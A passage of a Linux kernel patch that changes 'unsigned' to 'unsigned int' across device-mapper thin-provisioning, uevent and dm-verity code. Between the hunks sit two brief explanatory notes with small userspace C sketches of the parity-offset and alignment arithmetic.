+@@ -499,7 +499,7 @@ static char **realloc_argv(unsigned *size, char **old_argv)
+ int dm_split_args(int *argc, char ***argvp, char *input)
+ {
+ 	char *start, *end = input, *out, **argv = NULL;
+-	unsigned array_size = 0;
++	unsigned int array_size = 0;
+ 
+ 	*argc = 0;
+ 
+@@ -732,9 +732,8 @@ int dm_table_add_target(struct dm_table *t, const char *type,
+ /*
+  * Target argument parsing helpers.
+  */
+-static int validate_next_arg(const struct dm_arg *arg,
+-			     struct dm_arg_set *arg_set,
+-			     unsigned *value, char **error, unsigned grouped)
++static int validate_next_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
++			     unsigned int *value, char **error, unsigned int grouped)
+ {
+ 	const char *arg_str = dm_shift_arg(arg_set);
+ 	char dummy;
+@@ -752,14 +751,14 @@ static int validate_next_arg(const struct dm_arg *arg,
+ }
+ 
+ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		unsigned *value, char **error)
++		unsigned int *value, char **error)
+ {
+ 	return validate_next_arg(arg, arg_set, value, error, 0);
+ }
+ EXPORT_SYMBOL(dm_read_arg);
+ 
+ int dm_read_arg_group(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		      unsigned *value, char **error)
++		      unsigned int *value, char **error)
+ {
+ 	return validate_next_arg(arg, arg_set, value, error, 1);
+ }
+@@ -780,7 +779,7 @@ const char *dm_shift_arg(struct dm_arg_set *as)
+ }
+ EXPORT_SYMBOL(dm_shift_arg);
+ 
+-void dm_consume_args(struct dm_arg_set *as, unsigned num_args)
++void dm_consume_args(struct dm_arg_set *as, unsigned int num_args)
+ {
+ 	BUG_ON(as->argc < num_args);
+ 	as->argc -= num_args;
+@@ -856,7 +855,7 @@ static int device_is_rq_stackable(struct dm_target *ti, struct dm_dev *dev,
+ 
+ static int dm_table_determine_type(struct dm_table *t)
+ {
+-	unsigned bio_based = 0, request_based = 0, hybrid = 0;
++	unsigned int bio_based = 0, request_based = 0, hybrid = 0;
+ 	struct dm_target *ti;
+ 	struct list_head *devices = dm_table_get_devices(t);
+ 	enum dm_queue_mode live_md_type = dm_get_md_type(t->md);
+@@ -1535,7 +1534,7 @@ static bool dm_table_any_dev_attr(struct dm_table *t,
+ static int count_device(struct dm_target *ti, struct dm_dev *dev,
+ 			sector_t start, sector_t len, void *data)
+ {
+-	unsigned *num_devices = data;
++	unsigned int *num_devices = data;
+ 
+ 	(*num_devices)++;
+ 
+@@ -1565,7 +1564,7 @@ bool dm_table_has_no_data_devices(struct dm_table *t)
+ {
+ 	for (unsigned int i = 0; i < t->num_targets; i++) {
+ 		struct dm_target *ti = dm_table_get_target(t, i);
+-		unsigned num_devices = 0;
++		unsigned int num_devices = 0;
+ 
+ 		if (!ti->type->iterate_devices)
+ 			return false;
+diff --git a/drivers/md/dm-thin-metadata.c b/drivers/md/dm-thin-metadata.c
+index 6bcc4c4786d89..80545ec541210 100644
+--- a/drivers/md/dm-thin-metadata.c
++++ b/drivers/md/dm-thin-metadata.c
+@@ -318,12 +318,12 @@ static void unpack_block_time(uint64_t v, dm_block_t *b, uint32_t *t)
+  */
+ typedef int (*run_fn)(struct dm_space_map *, dm_block_t, dm_block_t);
+ 
+-static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned count, run_fn fn)
++static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned int count, run_fn fn)
+ {
+ 	uint64_t b, begin, end;
+ 	uint32_t t;
+ 	bool in_run = false;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, value_le++) {
+ 		/* We know value_le is 8 byte aligned */
+@@ -348,13 +348,13 @@ static void with_runs(struct dm_space_map *sm, const __le64 *value_le, unsigned
+ 		fn(sm, begin, end);
+ }
+ 
+-static void data_block_inc(void *context, const void *value_le, unsigned count)
++static void data_block_inc(void *context, const void *value_le, unsigned int count)
+ {
+ 	with_runs((struct dm_space_map *) context,
+ 		  (const __le64 *) value_le, count, dm_sm_inc_blocks);
+ }
+ 
+-static void data_block_dec(void *context, const void *value_le, unsigned count)
++static void data_block_dec(void *context, const void *value_le, unsigned int count)
+ {
+ 	with_runs((struct dm_space_map *) context,
+ 		  (const __le64 *) value_le, count, dm_sm_dec_blocks);
+@@ -374,21 +374,21 @@ static int data_block_equal(void *context, const void *value1_le, const void *va
+ 	return b1 == b2;
+ }
+ 
+-static void subtree_inc(void *context, const void *value, unsigned count)
++static void subtree_inc(void *context, const void *value, unsigned int count)
+ {
+ 	struct dm_btree_info *info = context;
+ 	const __le64 *root_le = value;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, root_le++)
+ 		dm_tm_inc(info->tm, le64_to_cpu(*root_le));
+ }
+ 
+-static void subtree_dec(void *context, const void *value, unsigned count)
++static void subtree_dec(void *context, const void *value, unsigned int count)
+ {
+ 	struct dm_btree_info *info = context;
+ 	const __le64 *root_le = value;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, root_le++)
+ 		if (dm_btree_del(info, le64_to_cpu(*root_le)))
+@@ -448,10 +448,10 @@ static int superblock_lock(struct dm_pool_metadata *pmd,
+ static int __superblock_all_zeroes(struct dm_block_manager *bm, int *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -971,7 +971,7 @@ struct dm_pool_metadata *dm_pool_metadata_open(struct block_device *bdev,
+ int dm_pool_metadata_close(struct dm_pool_metadata *pmd)
+ {
+ 	int r;
+-	unsigned open_devices = 0;
++	unsigned int open_devices = 0;
+ 	struct dm_thin_device *td, *tmp;
+ 
+ 	down_read(&pmd->root_lock);
+@@ -1679,7 +1679,7 @@ int dm_thin_insert_block(struct dm_thin_device *td, dm_block_t block,
+ static int __remove_range(struct dm_thin_device *td, dm_block_t begin, dm_block_t end)
+ {
+ 	int r;
+-	unsigned count, total_count = 0;
++	unsigned int count, total_count = 0;
+ 	struct dm_pool_metadata *pmd = td->pmd;
+ 	dm_block_t keys[1] = { td->id };
+ 	__le64 value;
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index 90df6c3da77a2..d12aff50974a9 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -32,7 +32,7 @@
+ #define COMMIT_PERIOD HZ
+ #define NO_SPACE_TIMEOUT_SECS 60
+ 
+-static unsigned no_space_timeout_secs = NO_SPACE_TIMEOUT_SECS;
++static unsigned int no_space_timeout_secs = NO_SPACE_TIMEOUT_SECS;
+ 
+ DECLARE_DM_KCOPYD_THROTTLE_WITH_MODULE_PARM(snapshot_copy_throttle,
+ 		"A percentage of time allocated for copy on write");
+@@ -254,7 +254,7 @@ struct pool {
+ 	struct delayed_work no_space_timeout;
+ 
+ 	unsigned long last_commit_jiffies;
+-	unsigned ref_count;
++	unsigned int ref_count;
+ 
+ 	spinlock_t lock;
+ 	struct bio_list deferred_flush_bios;
+@@ -2159,7 +2159,7 @@ static void process_thin_deferred_bios(struct thin_c *tc)
+ 	struct bio *bio;
+ 	struct bio_list bios;
+ 	struct blk_plug plug;
+-	unsigned count = 0;
++	unsigned int count = 0;
+ 
+ 	if (tc->requeue_mode) {
+ 		error_thin_bio_list(tc, &tc->deferred_bio_list,
+@@ -2229,9 +2229,9 @@ static int cmp_cells(const void *lhs, const void *rhs)
+ 	return 0;
+ }
+ 
+-static unsigned sort_cells(struct pool *pool, struct list_head *cells)
++static unsigned int sort_cells(struct pool *pool, struct list_head *cells)
+ {
+-	unsigned count = 0;
++	unsigned int count = 0;
+ 	struct dm_bio_prison_cell *cell, *tmp;
+ 
+ 	list_for_each_entry_safe(cell, tmp, cells, user_list) {
+@@ -2252,7 +2252,7 @@ static void process_thin_deferred_cells(struct thin_c *tc)
+ 	struct pool *pool = tc->pool;
+ 	struct list_head cells;
+ 	struct dm_bio_prison_cell *cell;
+-	unsigned i, j, count;
++	unsigned int i, j, count;
+ 
+ 	INIT_LIST_HEAD(&cells);
+ 
+@@ -3115,7 +3115,7 @@ static int parse_pool_features(struct dm_arg_set *as, struct pool_features *pf,
+ 			       struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -3252,7 +3252,7 @@ static dm_block_t calc_metadata_threshold(struct pool_c *pt)
+  *	     read_only: Don't allow any changes to be made to the pool metadata.
+  *	     error_if_no_space: error IOs, instead of queueing, if no space.
+  */
+-static int pool_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int pool_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r, pool_created = 0;
+ 	struct pool_c *pt;
+@@ -3648,7 +3648,7 @@ static void pool_postsuspend(struct dm_target *ti)
+ 	(void) commit(pool);
+ }
+ 
+-static int check_arg_count(unsigned argc, unsigned args_required)
++static int check_arg_count(unsigned int argc, unsigned int args_required)
+ {
+ 	if (argc != args_required) {
+ 		DMWARN("Message received with %u arguments instead of %u.",
+@@ -3671,7 +3671,7 @@ static int read_dev_id(char *arg, dm_thin_id *dev_id, int warning)
+ 	return -EINVAL;
+ }
+ 
+-static int process_create_thin_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_create_thin_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	int r;
+@@ -3694,7 +3694,7 @@ static int process_create_thin_mesg(unsigned argc, char **argv, struct pool *poo
+ 	return 0;
+ }
+ 
+-static int process_create_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_create_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	dm_thin_id origin_dev_id;
+@@ -3722,7 +3722,7 @@ static int process_create_snap_mesg(unsigned argc, char **argv, struct pool *poo
+ 	return 0;
+ }
+ 
+-static int process_delete_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_delete_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id dev_id;
+ 	int r;
+@@ -3742,7 +3742,7 @@ static int process_delete_mesg(unsigned argc, char **argv, struct pool *pool)
+ 	return r;
+ }
+ 
+-static int process_set_transaction_id_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_set_transaction_id_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	dm_thin_id old_id, new_id;
+ 	int r;
+@@ -3771,7 +3771,7 @@ static int process_set_transaction_id_mesg(unsigned argc, char **argv, struct po
+ 	return 0;
+ }
+ 
+-static int process_reserve_metadata_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_reserve_metadata_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	int r;
+ 
+@@ -3788,7 +3788,7 @@ static int process_reserve_metadata_snap_mesg(unsigned argc, char **argv, struct
+ 	return r;
+ }
+ 
+-static int process_release_metadata_snap_mesg(unsigned argc, char **argv, struct pool *pool)
++static int process_release_metadata_snap_mesg(unsigned int argc, char **argv, struct pool *pool)
+ {
+ 	int r;
+ 
+@@ -3812,8 +3812,8 @@ static int process_release_metadata_snap_mesg(unsigned argc, char **argv, struct
+  *   reserve_metadata_snap
+  *   release_metadata_snap
+  */
+-static int pool_message(struct dm_target *ti, unsigned argc, char **argv,
+-			char *result, unsigned maxlen)
++static int pool_message(struct dm_target *ti, unsigned int argc, char **argv,
++			char *result, unsigned int maxlen)
+ {
+ 	int r = -EINVAL;
+ 	struct pool_c *pt = ti->private;
+@@ -3853,9 +3853,9 @@ static int pool_message(struct dm_target *ti, unsigned argc, char **argv,
+ }
+ 
+ static void emit_flags(struct pool_features *pf, char *result,
+-		       unsigned sz, unsigned maxlen)
++		       unsigned int sz, unsigned int maxlen)
+ {
+-	unsigned count = !pf->zero_new_blocks + !pf->discard_enabled +
++	unsigned int count = !pf->zero_new_blocks + !pf->discard_enabled +
+ 		!pf->discard_passdown + (pf->mode == PM_READ_ONLY) +
+ 		pf->error_if_no_space;
+ 	DMEMIT("%u ", count);
+@@ -3883,10 +3883,10 @@ static void emit_flags(struct pool_features *pf, char *result,
+  *    <pool mode> <discard config> <no space config> <needs_check>
+  */
+ static void pool_status(struct dm_target *ti, status_type_t type,
+-			unsigned status_flags, char *result, unsigned maxlen)
++			unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	uint64_t transaction_id;
+ 	dm_block_t nr_free_blocks_data;
+ 	dm_block_t nr_free_blocks_metadata;
+@@ -4148,7 +4148,7 @@ static void thin_dtr(struct dm_target *ti)
+  * If the pool device has discards disabled, they get disabled for the thin
+  * device as well.
+  */
+-static int thin_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int thin_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r;
+ 	struct thin_c *tc;
+@@ -4371,7 +4371,7 @@ static int thin_preresume(struct dm_target *ti)
+  * <nr mapped sectors> <highest mapped sector>
+  */
+ static void thin_status(struct dm_target *ti, status_type_t type,
+-			unsigned status_flags, char *result, unsigned maxlen)
++			unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	ssize_t sz = 0;
+diff --git a/drivers/md/dm-uevent.c b/drivers/md/dm-uevent.c
+index 8671267200d88..a02b3f6ea47a8 100644
+--- a/drivers/md/dm-uevent.c
++++ b/drivers/md/dm-uevent.c
+@@ -60,7 +60,7 @@ static struct dm_uevent *dm_build_path_uevent(struct mapped_device *md,
+ 					      enum kobject_action action,
+ 					      const char *dm_action,
+ 					      const char *path,
+-					      unsigned nr_valid_paths)
++					      unsigned int nr_valid_paths)
+ {
+ 	struct dm_uevent *event;
+ 
+@@ -168,7 +168,7 @@ EXPORT_SYMBOL_GPL(dm_send_uevents);
+  *
+  */
+ void dm_path_uevent(enum dm_uevent_type event_type, struct dm_target *ti,
+-		   const char *path, unsigned nr_valid_paths)
++		   const char *path, unsigned int nr_valid_paths)
+ {
+ 	struct mapped_device *md = dm_table_get_md(ti->table);
+ 	struct dm_uevent *event;
+diff --git a/drivers/md/dm-uevent.h b/drivers/md/dm-uevent.h
+index d30d226f2a181..2c9ba561fd8e9 100644
+--- a/drivers/md/dm-uevent.h
++++ b/drivers/md/dm-uevent.h
+@@ -20,7 +20,7 @@ extern void dm_uevent_exit(void);
+ extern void dm_send_uevents(struct list_head *events, struct kobject *kobj);
+ extern void dm_path_uevent(enum dm_uevent_type event_type,
+ 			   struct dm_target *ti, const char *path,
+-			   unsigned nr_valid_paths);
++			   unsigned int nr_valid_paths);
+ 
+ #else
+ 
+@@ -37,7 +37,7 @@ static inline void dm_send_uevents(struct list_head *events,
+ }
+ static inline void dm_path_uevent(enum dm_uevent_type event_type,
+ 				  struct dm_target *ti, const char *path,
+-				  unsigned nr_valid_paths)
++				  unsigned int nr_valid_paths)
+ {
+ }
+ 
+diff --git a/drivers/md/dm-verity-fec.c b/drivers/md/dm-verity-fec.c
+index 23cffce564035..962fc32c947c5 100644
+--- a/drivers/md/dm-verity-fec.c
++++ b/drivers/md/dm-verity-fec.c
+@@ -59,14 +59,14 @@ static int fec_decode_rs8(struct dm_verity *v, struct dm_verity_fec_io *fio,
+  * to the data block. Caller is responsible for releasing buf.
+  */
+ static u8 *fec_read_parity(struct dm_verity *v, u64 rsb, int index,
+-			   unsigned *offset, struct dm_buffer **buf)
++			   unsigned int *offset, struct dm_buffer **buf)
+ {
+ 	u64 position, block, rem;
+ 	u8 *res;
+ 
+ 	position = (index + rsb) * v->fec->roots;
+ 	block = div64_u64_rem(position, v->fec->io_size, &rem);
+-	*offset = (unsigned)rem;
++	*offset = (unsigned int)rem;
+ 
+ 	res = dm_bufio_read(v->fec->bufio, block, buf);
+ 	if (IS_ERR(res)) {
+@@ -102,7 +102,7 @@ static u8 *fec_read_parity(struct dm_verity *v, u64 rsb, int index,
+  */
+ static inline u8 *fec_buffer_rs_block(struct dm_verity *v,
+ 				      struct dm_verity_fec_io *fio,
+-				      unsigned i, unsigned j)
++				      unsigned int i, unsigned int j)
+ {
+ 	return &fio->bufs[i][j * v->fec->rsn];
+ }
+@@ -111,7 +111,7 @@ static inline u8 *fec_buffer_rs_block(struct dm_verity *v,
+  * Return an index to the current RS block when called inside
+  * fec_for_each_buffer_rs_block.
+  */
+-static inline unsigned fec_buffer_rs_index(unsigned i, unsigned j)
++static inline unsigned int fec_buffer_rs_index(unsigned int i, unsigned int j)
+ {
+ 	return (i << DM_VERITY_FEC_BUF_RS_BITS) + j;
+ }
+@@ -121,12 +121,12 @@ static inline unsigned fec_buffer_rs_index(unsigned i, unsigned j)
+  * starting from block_offset.
+  */
+ static int fec_decode_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio,
+-			   u64 rsb, int byte_index, unsigned block_offset,
++			   u64 rsb, int byte_index, unsigned int block_offset,
+ 			   int neras)
+ {
+ 	int r, corrected = 0, res;
+ 	struct dm_buffer *buf;
+-	unsigned n, i, offset;
++	unsigned int n, i, offset;
+ 	u8 *par, *block;
+ 
+ 	par = fec_read_parity(v, rsb, block_offset, &offset, &buf);
+@@ -197,7 +197,7 @@ static int fec_is_erasure(struct dm_verity *v, struct dm_verity_io *io,
+  * fits into buffers. Check for erasure locations if @neras is non-NULL.
+  */
+ static int fec_read_bufs(struct dm_verity *v, struct dm_verity_io *io,
+-			 u64 rsb, u64 target, unsigned block_offset,
++			 u64 rsb, u64 target, unsigned int block_offset,
+ 			 int *neras)
+ {
+ 	bool is_zero;
+@@ -208,7 +208,7 @@ static int fec_read_bufs(struct dm_verity *v, struct dm_verity_io *io,
+ 	u64 block, ileaved;
+ 	u8 *bbuf, *rs_block;
+ 	u8 want_digest[HASH_MAX_DIGESTSIZE];
+-	unsigned n, k;
++	unsigned int n, k;
+ 
+ 	if (neras)
+ 		*neras = 0;
+@@ -304,7 +304,7 @@ done:
+  */
+ static int fec_alloc_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+ {
+-	unsigned n;
++	unsigned int n;
+ 
+ 	if (!fio->rs)
+ 		fio->rs = mempool_alloc(&v->fec->rs_pool, GFP_NOIO);
+@@ -344,7 +344,7 @@ static int fec_alloc_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+  */
+ static void fec_init_bufs(struct dm_verity *v, struct dm_verity_fec_io *fio)
+ {
+-	unsigned n;
++	unsigned int n;
+ 
+ 	fec_for_each_buffer(fio, n)
+ 		memset(fio->bufs[n], 0, v->fec->rsn << DM_VERITY_FEC_BUF_RS_BITS);
+@@ -362,7 +362,7 @@ static int fec_decode_rsb(struct dm_verity *v, struct dm_verity_io *io,
+ 			  bool use_erasures)
+ {
+ 	int r, neras = 0;
+-	unsigned pos;
++	unsigned int pos;
+ 
+ 	r = fec_alloc_bufs(v, fio);
+ 	if (unlikely(r < 0))
+@@ -484,7 +484,7 @@ done:
+  */
+ void verity_fec_finish_io(struct dm_verity_io *io)
+ {
+-	unsigned n;
++	unsigned int n;
+ 	struct dm_verity_fec *f = io->v->fec;
+ 	struct dm_verity_fec_io *fio = fec_io(io);
+ 
+@@ -522,8 +522,8 @@ void verity_fec_init_io(struct dm_verity_io *io)
+ /*
+  * Append feature arguments and values to the status table.
+  */
+-unsigned verity_fec_status_table(struct dm_verity *v, unsigned sz,
+-				 char *result, unsigned maxlen)
++unsigned int verity_fec_status_table(struct dm_verity *v, unsigned int sz,
++				 char *result, unsigned int maxlen)
+ {
+ 	if (!verity_fec_is_enabled(v))
+ 		return sz;
+@@ -589,7 +589,7 @@ bool verity_is_fec_opt_arg(const char *arg_name)
+ }
+ 
+ int verity_fec_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+-			      unsigned *argc, const char *arg_name)
++			      unsigned int *argc, const char *arg_name)
+ {
+ 	int r;
+ 	struct dm_target *ti = v->ti;
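
A note on the parity lookup in the hunks above: fec_read_parity() turns a Reed-Solomon buffer index into a (metadata block, byte offset) pair by plain division against the bufio block size. A minimal userspace sketch of that arithmetic follows; the rsb, roots and io_size values are illustrative assumptions, not values from the patch.

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint64_t rsb = 1000, roots = 2, io_size = 4096;	/* assumed values */
	int index = 7;
	uint64_t position = (index + rsb) * roots;
	uint64_t block = position / io_size;	/* div64_u64_rem() in-kernel */
	unsigned int offset = (unsigned int)(position % io_size);

	printf("parity at block %llu, offset %u\n",
	       (unsigned long long)block, offset);
	return 0;
}
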
+diff --git a/drivers/md/dm-verity-fec.h b/drivers/md/dm-verity-fec.h
+index 3c46c8d618833..8454070d28242 100644
+--- a/drivers/md/dm-verity-fec.h
++++ b/drivers/md/dm-verity-fec.h
+@@ -55,10 +55,10 @@ struct dm_verity_fec_io {
+ 	struct rs_control *rs;	/* Reed-Solomon state */
+ 	int erasures[DM_VERITY_FEC_MAX_RSN];	/* erasures for decode_rs8 */
+ 	u8 *bufs[DM_VERITY_FEC_BUF_MAX];	/* bufs for deinterleaving */
+-	unsigned nbufs;		/* number of buffers allocated */
++	unsigned int nbufs;		/* number of buffers allocated */
+ 	u8 *output;		/* buffer for corrected output */
+ 	size_t output_pos;
+-	unsigned level;		/* recursion level */
++	unsigned int level;		/* recursion level */
+ };
+ 
+ #ifdef CONFIG_DM_VERITY_FEC
+@@ -72,15 +72,15 @@ extern int verity_fec_decode(struct dm_verity *v, struct dm_verity_io *io,
+ 			     enum verity_block_type type, sector_t block,
+ 			     u8 *dest, struct bvec_iter *iter);
+ 
+-extern unsigned verity_fec_status_table(struct dm_verity *v, unsigned sz,
+-					char *result, unsigned maxlen);
++extern unsigned int verity_fec_status_table(struct dm_verity *v, unsigned int sz,
++					char *result, unsigned int maxlen);
+ 
+ extern void verity_fec_finish_io(struct dm_verity_io *io);
+ extern void verity_fec_init_io(struct dm_verity_io *io);
+ 
+ extern bool verity_is_fec_opt_arg(const char *arg_name);
+ extern int verity_fec_parse_opt_args(struct dm_arg_set *as,
+-				     struct dm_verity *v, unsigned *argc,
++				     struct dm_verity *v, unsigned int *argc,
+ 				     const char *arg_name);
+ 
+ extern void verity_fec_dtr(struct dm_verity *v);
+@@ -106,9 +106,9 @@ static inline int verity_fec_decode(struct dm_verity *v,
+ 	return -EOPNOTSUPP;
+ }
+ 
+-static inline unsigned verity_fec_status_table(struct dm_verity *v,
+-					       unsigned sz, char *result,
+-					       unsigned maxlen)
++static inline unsigned int verity_fec_status_table(struct dm_verity *v,
++					       unsigned int sz, char *result,
++					       unsigned int maxlen)
+ {
+ 	return sz;
+ }
+@@ -128,7 +128,7 @@ static inline bool verity_is_fec_opt_arg(const char *arg_name)
+ 
+ static inline int verity_fec_parse_opt_args(struct dm_arg_set *as,
+ 					    struct dm_verity *v,
+-					    unsigned *argc,
++					    unsigned int *argc,
+ 					    const char *arg_name)
+ {
+ 	return -EINVAL;
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index ccf5b852fbf7a..64e8ac429984d 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -41,7 +41,7 @@
+ #define DM_VERITY_OPTS_MAX		(4 + DM_VERITY_OPTS_FEC + \
+ 					 DM_VERITY_ROOT_HASH_VERIFICATION_OPTS)
+ 
+-static unsigned dm_verity_prefetch_cluster = DM_VERITY_DEFAULT_PREFETCH_SIZE;
++static unsigned int dm_verity_prefetch_cluster = DM_VERITY_DEFAULT_PREFETCH_SIZE;
+ 
+ module_param_named(prefetch_cluster, dm_verity_prefetch_cluster, uint, S_IRUGO | S_IWUSR);
+ 
+@@ -51,7 +51,7 @@ struct dm_verity_prefetch_work {
+ 	struct work_struct work;
+ 	struct dm_verity *v;
+ 	sector_t block;
+-	unsigned n_blocks;
++	unsigned int n_blocks;
+ };
+ 
+ /*
+@@ -196,10 +196,10 @@ out:
+ }
+ 
+ static void verity_hash_at_level(struct dm_verity *v, sector_t block, int level,
+-				 sector_t *hash_block, unsigned *offset)
++				 sector_t *hash_block, unsigned int *offset)
+ {
+ 	sector_t position = verity_position_at_level(v, block, level);
+-	unsigned idx;
++	unsigned int idx;
+ 
+ 	*hash_block = v->hash_level_block[level] + (position >> v->hash_per_block_bits);
+ 
+@@ -287,7 +287,7 @@ static int verity_verify_level(struct dm_verity *v, struct dm_verity_io *io,
+ 	u8 *data;
+ 	int r;
+ 	sector_t hash_block;
+-	unsigned offset;
++	unsigned int offset;
+ 
+ 	verity_hash_at_level(v, block, level, &hash_block, &offset);
+ 
+@@ -445,13 +445,13 @@ int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 				       struct dm_verity_io *io, u8 *data,
+ 				       size_t len))
+ {
+-	unsigned todo = 1 << v->data_dev_block_bits;
++	unsigned int todo = 1 << v->data_dev_block_bits;
+ 	struct bio *bio = dm_bio_from_per_bio_data(io, v->ti->per_io_data_size);
+ 
+ 	do {
+ 		int r;
+ 		u8 *page;
+-		unsigned len;
++		unsigned int len;
+ 		struct bio_vec bv = bio_iter_iovec(bio, *iter);
+ 
+ 		page = bvec_kmap_local(&bv);
+@@ -688,7 +688,7 @@ static void verity_prefetch_io(struct work_struct *work)
+ 		verity_hash_at_level(v, pw->block, i, &hash_block_start, NULL);
+ 		verity_hash_at_level(v, pw->block + pw->n_blocks - 1, i, &hash_block_end, NULL);
+ 		if (!i) {
+-			unsigned cluster = READ_ONCE(dm_verity_prefetch_cluster);
++			unsigned int cluster = READ_ONCE(dm_verity_prefetch_cluster);
+ 
+ 			cluster >>= v->data_dev_block_bits;
+ 			if (unlikely(!cluster))
+@@ -753,7 +753,7 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+ 	bio_set_dev(bio, v->data_dev->bdev);
+ 	bio->bi_iter.bi_sector = verity_map_sector(v, bio->bi_iter.bi_sector);
+ 
+-	if (((unsigned)bio->bi_iter.bi_sector | bio_sectors(bio)) &
++	if (((unsigned int)bio->bi_iter.bi_sector | bio_sectors(bio)) &
+ 	    ((1 << (v->data_dev_block_bits - SECTOR_SHIFT)) - 1)) {
+ 		DMERR_LIMIT("unaligned io");
+ 		return DM_MAPIO_KILL;
+@@ -789,12 +789,12 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+  * Status: V (valid) or C (corruption found)
+  */
+ static void verity_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_verity *v = ti->private;
+-	unsigned args = 0;
+-	unsigned sz = 0;
+-	unsigned x;
++	unsigned int args = 0;
++	unsigned int sz = 0;
++	unsigned int x;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+@@ -1054,7 +1054,7 @@ static int verity_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+ 				 bool only_modifier_opts)
+ {
+ 	int r = 0;
+-	unsigned argc;
++	unsigned int argc;
+ 	struct dm_target *ti = v->ti;
+ 	const char *arg_name;
+ 
+@@ -1156,7 +1156,7 @@ static int verity_parse_opt_args(struct dm_arg_set *as, struct dm_verity *v,
+  *	<digest>
+  *	<salt>		Hex string or "-" if no salt.
+  */
+-static int verity_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int verity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_verity *v;
+ 	struct dm_verity_sig_opts verify_args = {0};
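
The verity_map() hunk above keeps the alignment check that ORs the start sector with the sector count before masking, so a single test catches misalignment of either value. A small userspace sketch, assuming a 4096-byte data block (eight 512-byte sectors):

#include <stdio.h>
#include <stdint.h>

#define SECTOR_SHIFT 9

static int unaligned(uint64_t sector, unsigned int nr_sectors,
		     unsigned int data_dev_block_bits)
{
	unsigned int mask = (1u << (data_dev_block_bits - SECTOR_SHIFT)) - 1;

	/* misaligned start or misaligned length both leave low bits set */
	return (((unsigned int)sector | nr_sectors) & mask) != 0;
}

int main(void)
{
	printf("%d\n", unaligned(8, 8, 12));	/* 0: aligned */
	printf("%d\n", unaligned(9, 8, 12));	/* 1: start misaligned */
	return 0;
}
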
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index 98f306ec6a33d..2f555b4203679 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -42,7 +42,7 @@ struct dm_verity {
+ 	u8 *root_digest;	/* digest of the root block */
+ 	u8 *salt;		/* salt: its size is salt_size */
+ 	u8 *zero_digest;	/* digest for a zero block */
+-	unsigned salt_size;
++	unsigned int salt_size;
+ 	sector_t data_start;	/* data offset in 512-byte sectors */
+ 	sector_t hash_start;	/* hash start in blocks */
+ 	sector_t data_blocks;	/* the number of data blocks */
+@@ -54,10 +54,10 @@ struct dm_verity {
+ 	unsigned char version;
+ 	bool hash_failed:1;	/* set if hash of any block failed */
+ 	bool use_tasklet:1;	/* try to verify in tasklet before work-queue */
+-	unsigned digest_size;	/* digest size for the current hash algorithm */
++	unsigned int digest_size;	/* digest size for the current hash algorithm */
+ 	unsigned int ahash_reqsize;/* the size of temporary space for crypto */
+ 	enum verity_mode mode;	/* mode for handling verification errors */
+-	unsigned corrupted_errs;/* Number of errors for corrupted blocks */
++	unsigned int corrupted_errs;/* Number of errors for corrupted blocks */
+ 
+ 	struct workqueue_struct *verify_wq;
+ 
+@@ -77,7 +77,7 @@ struct dm_verity_io {
+ 	bio_end_io_t *orig_bi_end_io;
+ 
+ 	sector_t block;
+-	unsigned n_blocks;
